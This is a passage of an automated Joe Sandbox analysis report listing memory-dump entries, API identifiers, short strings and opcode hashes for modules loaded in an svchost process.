                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: SimpleString::operator=
                                                                                                                                                                                • String ID: %s: %s$Start Date$TRUE
                                                                                                                                                                                • API String ID: 356670603-2230884944
                                                                                                                                                                                • Opcode ID: 717ef4d16cc785739bee4e15e022a01d3eebdd280f1522e8952904650144c1b7
                                                                                                                                                                                • Instruction ID: 68426271373fe5bbee2c2677eb10a2ae6b761a64f44c6effa338164b9b03015a
                                                                                                                                                                                • Opcode Fuzzy Hash: 717ef4d16cc785739bee4e15e022a01d3eebdd280f1522e8952904650144c1b7
                                                                                                                                                                                • Instruction Fuzzy Hash: 9821BE31A0C78786EA208B2D98546FA7B91AB4D7C8F880431DB4D47296DF2CE50ACB48
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _errnofreestrtoul
                                                                                                                                                                                • String ID: Invalid zoneid: %s; %s
                                                                                                                                                                                • API String ID: 3069384960-3603716281
                                                                                                                                                                                • Opcode ID: 3ab2bff2d4ea0c7589c6f43ca664e3e419b245810dbbbf09ef73d8b31cb40d85
                                                                                                                                                                                • Instruction ID: 5e57326ae0321200aef321c0ad612528ed9ea8eda5e61376e0c281009628b6ba
                                                                                                                                                                                • Opcode Fuzzy Hash: 3ab2bff2d4ea0c7589c6f43ca664e3e419b245810dbbbf09ef73d8b31cb40d85
                                                                                                                                                                                • Instruction Fuzzy Hash: 42216561A18A8186EA608B19E4603BA7361FF8CBD8F4C0131DF8D47755EF2CD546CB04
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: SimpleString::operator=
                                                                                                                                                                                • String ID: %s: %s$FALSE$TRUE
                                                                                                                                                                                • API String ID: 356670603-1493108610
                                                                                                                                                                                • Opcode ID: daf49c2a0e5950b4c13542c99a0ede73fdb564fc4b3aced2fa4cf1660ad61e1b
                                                                                                                                                                                • Instruction ID: 9bb7e0039969f7863327f7cfa4d0a271c90e861aa79bbfb0f4f55a25ce075942
                                                                                                                                                                                • Opcode Fuzzy Hash: daf49c2a0e5950b4c13542c99a0ede73fdb564fc4b3aced2fa4cf1660ad61e1b
                                                                                                                                                                                • Instruction Fuzzy Hash: 4E11B222B0878692EE51D71AE8507BB6791BB5C7C4F480031DF4C43796EF6CE54AC748
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • Error while processing content unencoding: %s, xrefs: 00007FF8B836EC98
                                                                                                                                                                                • Error while processing content unencoding: Unknown failure within decompression software., xrefs: 00007FF8B836ECA6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: freeinflate
                                                                                                                                                                                • String ID: Error while processing content unencoding: %s$Error while processing content unencoding: Unknown failure within decompression software.
                                                                                                                                                                                • API String ID: 3681154942-1163695657
                                                                                                                                                                                • Opcode ID: 2e00a30762b757a7393df8481a108854689e61f3c9c0cecb84e169fbd818293a
                                                                                                                                                                                • Instruction ID: 65e737b33cd3b1497f35162bc7f8c119f7de829d897e62a90710910b23c4a018
                                                                                                                                                                                • Opcode Fuzzy Hash: 2e00a30762b757a7393df8481a108854689e61f3c9c0cecb84e169fbd818293a
                                                                                                                                                                                • Instruction Fuzzy Hash: 79011B71A0CB42C2EB609F5DE980369B6A0AB48BC0F5C4031DB4D07795DF3CE89ACB08
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                                • String ID: _Jv_RegisterClasses$libgcj-16.dll
                                                                                                                                                                                • API String ID: 1646373207-328863460
                                                                                                                                                                                • Opcode ID: 58a78faa62b6ea0adafa5f67330d527f61d12f84308a401e3d504159fb202e35
                                                                                                                                                                                • Instruction ID: abc870a32fdd0affd7bd39a118d3dd5c1713376495ffab325016c1d358ec94e8
                                                                                                                                                                                • Opcode Fuzzy Hash: 58a78faa62b6ea0adafa5f67330d527f61d12f84308a401e3d504159fb202e35
                                                                                                                                                                                • Instruction Fuzzy Hash: 95F05EB461260AD4FE099B66E8A436422E6BF44B95FC48225C42E063F1EF2EC1EDC740
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                                • String ID: _set_output_format$msvcrt.dll
                                                                                                                                                                                • API String ID: 1646373207-3508247455
                                                                                                                                                                                • Opcode ID: 31576091158149f3a77b9dcd1ccbabc532ccb788dabd2972e4e02356cded6b21
                                                                                                                                                                                • Instruction ID: ba239edb8cfac21c1becf32f85b5240974a0723e81edd6ca46e9f90c3e6473b7
                                                                                                                                                                                • Opcode Fuzzy Hash: 31576091158149f3a77b9dcd1ccbabc532ccb788dabd2972e4e02356cded6b21
                                                                                                                                                                                • Instruction Fuzzy Hash: AAE0EC75711B1BD2FF08DB96B8F535423A2AB08B94F44922AC51E47364EE6985A9C300
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                                • String ID: _get_output_format$msvcrt.dll
                                                                                                                                                                                • API String ID: 1646373207-3432234555
                                                                                                                                                                                • Opcode ID: 09177e8ed118ef47efb88fbb65359de9a8f64e5846bf0d2c5c23e6c55361faa6
                                                                                                                                                                                • Instruction ID: f653141790658bc172c86a7e61f1d616f1332d7f6b00e7acaa975b84ae96483c
                                                                                                                                                                                • Opcode Fuzzy Hash: 09177e8ed118ef47efb88fbb65359de9a8f64e5846bf0d2c5c23e6c55361faa6
                                                                                                                                                                                • Instruction Fuzzy Hash: ADD06774601B1BD1EE08DB56F9B530423A2BB05B99F40D715C40E43334EF7E8165D300
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: freememcpy$malloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 169112436-0
                                                                                                                                                                                • Opcode ID: 50021c32a11f02c3b2ae97c7a92e49f7883138b21f1e2bce741569c1d457c20b
                                                                                                                                                                                • Instruction ID: b8b6b418da4433def4fda2c62a00e56fd928196d4e6d6da1984d6febaeefa589
                                                                                                                                                                                • Opcode Fuzzy Hash: 50021c32a11f02c3b2ae97c7a92e49f7883138b21f1e2bce741569c1d457c20b
                                                                                                                                                                                • Instruction Fuzzy Hash: C3914AB2219A5989DF20CF19E58476E7BB2F74578AFD48212DAAE037D8DB3DC149C700
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: freemallocmemcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3056473165-0
                                                                                                                                                                                • Opcode ID: d34ad63fa52c71e76510cc089053b9a2d3557ca37e7ac155e7b10e5618d7cdca
                                                                                                                                                                                • Instruction ID: 80a85a36751b7c900f9ddcfc534600054c3a2239c8d850a34ca140175f71beb3
                                                                                                                                                                                • Opcode Fuzzy Hash: d34ad63fa52c71e76510cc089053b9a2d3557ca37e7ac155e7b10e5618d7cdca
                                                                                                                                                                                • Instruction Fuzzy Hash: 2131CE66305A9981DF10CF19E1842AD6765F745BE5FC58326DEBE037D4EB38C58AC300
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Module$FileHandleName
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4146042529-0
                                                                                                                                                                                • Opcode ID: abe62e87e9e8c116a621af157a59a2834d541b47e7f9b4c4221b93f442f33894
                                                                                                                                                                                • Instruction ID: 49917fe9b7a7820e8d32e273904b2858a54d7b094bce7e13923d0d05c2849a10
                                                                                                                                                                                • Opcode Fuzzy Hash: abe62e87e9e8c116a621af157a59a2834d541b47e7f9b4c4221b93f442f33894
                                                                                                                                                                                • Instruction Fuzzy Hash: 83D1B862F5A646A2EE208F35D44037D63A1EB957E4F405232DA5D52BE4EF7CE681E300
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                • Opcode ID: 61968f2bda4b7725e469768de4b026144c0d949d4071d4cf1ec08468e51c5dd3
                                                                                                                                                                                • Instruction ID: 9363675e121eb9868326de6da5dcb598416617da8ae21973a4e339ebaa8798e3
                                                                                                                                                                                • Opcode Fuzzy Hash: 61968f2bda4b7725e469768de4b026144c0d949d4071d4cf1ec08468e51c5dd3
                                                                                                                                                                                • Instruction Fuzzy Hash: 47D1DE22B0AA81A9EB10CFB5D5406BC37B5FB84BD8B444226CF5D97B99DE38D606D340
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                • Opcode ID: ba293342d94ffe3c8aeb5c9959f4e856eb7cec13775bd3ec34c091d467a898c7
                                                                                                                                                                                • Instruction ID: c9114bb453cb3e2edbb3d79c07a86e773f7e42107647bbda70446d48f2ae1204
                                                                                                                                                                                • Opcode Fuzzy Hash: ba293342d94ffe3c8aeb5c9959f4e856eb7cec13775bd3ec34c091d467a898c7
                                                                                                                                                                                • Instruction Fuzzy Hash: 93118D36609B82C2DB449F6AE99012C73A4FF88F99B084126CE5E47768CF38D896C754
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 73155330-0
                                                                                                                                                                                • Opcode ID: 2bd4562e9858b68108555281e944be2d1cbe6c40673b24ef48021e29dfc0edd0
                                                                                                                                                                                • Instruction ID: 92e020d3a14a387c46ebac53bfbe87394aad79a8aa9e125f4dd8d24725a6b36e
                                                                                                                                                                                • Opcode Fuzzy Hash: 2bd4562e9858b68108555281e944be2d1cbe6c40673b24ef48021e29dfc0edd0
                                                                                                                                                                                • Instruction Fuzzy Hash: FBA1C26270AB46A1EE109F35E5442AE63A5FB48BE4F540632DFAD077C5EE3CE652D300
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Name::operator+
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2943138195-0
                                                                                                                                                                                • Opcode ID: eb6363aa35e74eb1977dca33720184fe80181e71b64f658a99948c17f7db5cb3
                                                                                                                                                                                • Instruction ID: 8e986541f1df58ff5fb8c9afad655b913368acae330ad6f605408a44b10c5501
                                                                                                                                                                                • Opcode Fuzzy Hash: eb6363aa35e74eb1977dca33720184fe80181e71b64f658a99948c17f7db5cb3
                                                                                                                                                                                • Instruction Fuzzy Hash: 7E918A62E0AB56A9FB118FB4D8503BC3BB1FB04788F544436CA4D17699EF7CAA45E340
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5d36bed7ca24cad982bc543e2d650294ca89f4693b3870b5ada356f095fade28
                                                                                                                                                                                • Instruction ID: 6dc7d19eb53cfb7f19f315de2b51d2defa7f44b61748d59b8954a9879d4b5e75
                                                                                                                                                                                • Opcode Fuzzy Hash: 5d36bed7ca24cad982bc543e2d650294ca89f4693b3870b5ada356f095fade28
